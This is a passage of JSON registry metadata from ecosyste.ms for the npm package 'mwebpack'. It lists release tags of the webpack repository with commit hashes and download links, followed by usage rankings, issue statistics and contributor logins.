pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-27T14:59:34.958Z","dependent_packages_count":1,"downloads":15,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":34.48671434639874,"dependent_repos_count":10.295976646711454,"dependent_packages_count":20.907756255897063,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":13.232310768222058},"purl":"pkg:npm/mwebpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/mwebpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/mwebpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/mwebpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-27T00:06:34.042Z","issues_count":10163,"pull_requests_count":9431,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2776093.13365612,"issues_closed_count":9897,"pull_requests_closed_count":8881,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.83508806454787,"avg_comments_per_pull_request":3.1767575018555827,"merged_pull_requests_count":6017,"bot_issues_count":8,"bot_pull_requests_count":2912,"past_year_issues_count":79,"past_year_pull_requests_count":934,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":362218.7858117326,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":733,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":61,"past_year_avg_comments_per_issue":3.481012658227848,"past_year_avg_comments_per_pull_request":4.836188436830835,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":579,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1075,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":433,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mwebpack/codemeta","maintainers":[{"uuid":"luowen","login":"luowen","name":null,"email":"